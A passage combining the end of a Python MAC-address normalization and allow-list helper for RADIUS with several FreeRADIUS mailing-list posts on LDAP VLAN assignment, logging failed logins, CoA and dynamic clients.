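# Cisco's dotted form (a dot every two pairs) also matches because the
# separator is optional; the anchors reject five- or seven-pair strings.
_MAC_RE = re.compile("^" + r"[:.\-]?".join([_HEX2] * 6) + "$", re.IGNORECASE)


def normalize_mac(value, style="rfc"):
    """Return the MAC as 'rfc' (00-19-7d-a6-ad-06), 'colon' (00:19:7d:a6:ad:06)
    or 'bare' (00197da6ad06), always lower-case; None if value is not a MAC."""
    m = _MAC_RE.match(value.strip())
    if not m:
        return None
    octets = [o.lower() for o in m.groups()]
    if style == "bare":
        return "".join(octets)
    if style == "colon":
        return ":".join(octets)
    return "-".join(octets)


def mac_allowed(calling_station_id, allow_list):
    """Compare in canonical form on both sides, so an allow-list entry written
    as 0019.7DA6.AD06 still matches a request carrying 00:19:7d:a6:ad:06."""
    wanted = normalize_mac(calling_station_id, "bare")
    if wanted is None:
        return False                      # garbage never matches anything
    return wanted in {normalize_mac(m, "bare") for m in allow_list}


if __name__ == "__main__":
    for raw in ("00:19:7D:A6:AD:06", "00-19-7d-a6-ad-06", "0019.7da6.ad06",
                "00197DA6AD06", "00:19:7d:a6:ad", "not a mac"):
        print(f"{raw!r:22} -> {normalize_mac(raw)}")
    print(mac_allowed("0019.7DA6.AD06", ["00-19-7d-a6-ad-06"]))
```

Like the unlang regex, this accepts mixed separators inside one address (00:19-7d.a6:ad-06); tighten the pattern to a single separator class if the NAS population is known to be consistent.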
vlan in ldap - full version
Hello list

I sent the last mail wrongly - here the correct version :

I am trying to assign different vlans for my different Radius-users.
The good news is that with a user defined in the users file it works fine.

The users file :

tester  cleartext-Password := "alois"
        Tunnel-Type = VLAN,
        Tunnel-Medium-Type = IEEE-802,
        Tunnel-Private-Group-Id = 155

The message:

++[eap] returns ok
Login OK: [tester] (from client ciscosw port 29 cli 00-1F-E1-23-71-85)
+- entering group post-auth {...}
++[exec] returns noop
Sending Access-Accept of id 255 to 10.53.240.10 port 32769
        Tunnel-Type:0 = VLAN
        Tunnel-Medium-Type:0 = IEEE-802
        Tunnel-Private-Group-Id:0 = "155"
        User-Name = "tester"
        MS-MPPE-Recv-Key = 0x283b539628ec3ece70444bce496d078fc67323356a6cd12f435f878743447f7a
        MS-MPPE-Send-Key = 0xa978c29338aa1547d14524b0f43bfcde45841e3bce0f9c30a0b6c3d57187d810
        EAP-Message = 0x03130004
        Message-Authenticator = 0x
Finished request 12.

But with my users in Ldap - it does not work - seems that radius doesn't reply the vlan-attributes

Some hints?

luis

my user in ldap :

dn: uid=test,ou=users,dc=sb-brixen,dc=it
objectClass: radiusprofile
radiusTunnelMediumType: IEEE-802
radiusTunnelType: VLAN
radiusTunnelPrivateGroupId: 154

The message i get:

[ldap] looking for check items in directory...
rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154"
rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802
rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN
...
Login OK: [test] (from client ciscosw port 29 cli 00-1F-E1-23-71-85)
+- entering group post-auth {...}
++[exec] returns noop
Sending Access-Accept of id 97 to 10.53.240.10 port 32769
        User-Name = "test"
        MS-MPPE-Recv-Key = 0x460785611f313ad630d4947a9f319303a05238d5b340b0a32d38a58b81a416aa
        MS-MPPE-Send-Key = 0xceeebab47129af3baa96c6fa859b26434b3894a32fddeeffc4f86bb9dfc080b1
        EAP-Message = 0x031a0004
        Message-Authenticator = 0x
Finished request 53.
Re: Calling-Station-Id case sensitive
t...@kalik.net wrote:
>
> You can use perl lc function to make sure attribute is always lower case.
> List perl before checkval.
>
I personally use lower() (pgsql) and do it at the SQL server end.

Cheers
Alex

--
Alexander Clouter
.sigmonster says: We are not a clone.
vlan in ldap
Hello list

I am trying to assign different vlans for my different Radius-users. The good news is that with a user defined in the users file it works fine.

The users file:

    tester  cleartext-Password := "alois"
            Tunnel-Type = VLAN,
            Tunnel-Medium-Type = IEEE-802,
            Tunnel-Private-Group-Id = 155

The message:

    ++[eap] returns ok
    Login OK: [tester] (from client ciscosw port 29 cli 00-1F-E1-23-71-85)
    +- entering group post-auth {...}
    ++[exec] returns noop
    Sending Access-Accept of id 255 to 10.53.240.10 port 32769
            Tunnel-Type:0 = VLAN
            Tunnel-Medium-Type:0 = IEEE-802
            Tunnel-Private-Group-Id:0 = "155"
            User-Name = "tester"
            MS-MPPE-Recv-Key = 0x283b539628ec3ece70444bce496d078fc67323356a6cd12f435f878743447f7a
            MS-MPPE-Send-Key = 0xa978c29338aa1547d14524b0f43bfcde45841e3bce0f9c30a0b6c3d57187d810
            EAP-Message = 0x03130004
            Message-Authenticator = 0x
    Finished request 12.

But with my users in Ldap - it does not work.

my user in ldap:

    dn: uid=test,ou=users,dc=sb-brixen,dc=it
    objectClass: radiusprofile
    radiusTunnelMediumType: IEEE-802
    radiusTunnelType: VLAN
    radiusTunnelPrivateGroupId: 154

The message:

    [ldap] looking for check items in directory...
    rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154"
    rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802
    rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN
    ...
Re: EAP/MD5 with mysql authentication failed
hi,

don't set the default auth-type for users

alan
How to log failed auth attempts?
Hello all,

I have been spending lots of time reading the list archives, reading the docs, sample configs and so on, but can't find a solution, so I thought I would ping the list for some help.

I am running FR 2.1.3 which I installed a few days ago. I have it doing most of what I need it to after a bit of work and lots of reading :)

The thing I am stuck on right now is how to get FR to log failed login attempts with the reason for the failure. At the moment I have it logging the failed attempts in the radpostauth table in MySQL. The problem is it only logs the result as a failure with no other info. I would love to get the Reply-Message in the table but will settle for this info in the radius.log or any text based log.

It seems that most things I have read suggest that failed authentication attempts are logged to the radius.log by default, but they do not show up for me.

How can I either get the failed authentications in a text log with the failure reason or get them in the MySQL table? The latter is preferred, but again I will settle for the text logging if it's all that's available.

I am a FR newb so the simpler the solution, the better :)

Thanks in advance for any help provided.

Regards,
Todd R.
Re: Sending Accounting Response
The only other option left is to use CoA. However, the radius client libraries that would form part of the NAS do not implement CoA. I have read the source code of all radius client libraries offered as part of FR, and even those made by others - none of them has a library which could be used to listen for radius packets on a given port and accept and acknowledge CoA/Packet of Disconnect. So I would have to write this from scratch, and would be most happy to contribute it back to the community.

But in all the rest of the world, CoA is a standard that is used for the purposes that you described.

--
With best regards,
Evgeniy Kozhuhovskiy
Leader of Services group, MGTS, RUE Beltelecom
Re: Duplicate IPs for Radius Clients with different secrets
Eric Geier wrote:
> If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how I'd keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent.

Alan,

The Nas-Identifier being available to dynamic clients will also solve Eric's problem.

Any update on when it might be available?

Thanks!

--
Johan Meiring
Cape PC Services CC
Tel: (021) 883-8271
Fax: (021) 886-7782